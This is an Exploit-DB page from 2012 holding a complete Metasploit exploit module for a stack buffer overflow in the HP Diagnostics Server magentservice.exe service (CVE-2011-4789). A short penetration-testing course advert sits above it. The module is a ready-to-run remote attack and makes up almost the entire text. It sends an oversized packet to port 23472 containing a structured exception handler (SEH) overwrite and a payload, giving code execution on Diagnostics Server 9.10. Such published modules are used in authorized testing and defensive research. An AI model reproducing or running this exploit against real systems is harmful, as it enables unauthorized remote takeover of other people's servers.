HP Diagnostics Server - 'magentservice.exe' Remote Overflow (Metasploit)

EDB-ID:

18423




Platform:

Windows

Date:

2012-01-27


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP Diagnostics Server magentservice.exe overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HP Diagnostics Server
				magentservice.exe service. By sending a specially crafted packet, an attacker
				may be able to execute arbitrary code. Originally found and posted by
				AbdulAziz Harir via ZDI.
			},
			'Author'         =>
				[
					'AbdulAziz Hariri', # Original discovery
					'hal',              # Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['OSVDB', '72815'],
					['CVE', '2011-4789'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
					'SSL' => true,
					'SSLVersion' => 'SSL3'
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'Targets'        =>
				[
					[
						'Diagnostics Server 9.10',
						{
							# pop esi # pop ebx # ret 10
							# magentservice.exe
							'Ret' => 0x780c8f1f
						}
					]
				],
			'DisclosureDate' => 'Jan 12 2012'))

			register_options([Opt::RPORT(23472)], self.class)
	end

	def exploit

		req =  "\x00\x00\x00\x00"
		req << rand_text_alpha_upper(1092)
		req << generate_seh_payload(target.ret)

		connect
		sock.put(req)

		handler
		disconnect

	end
end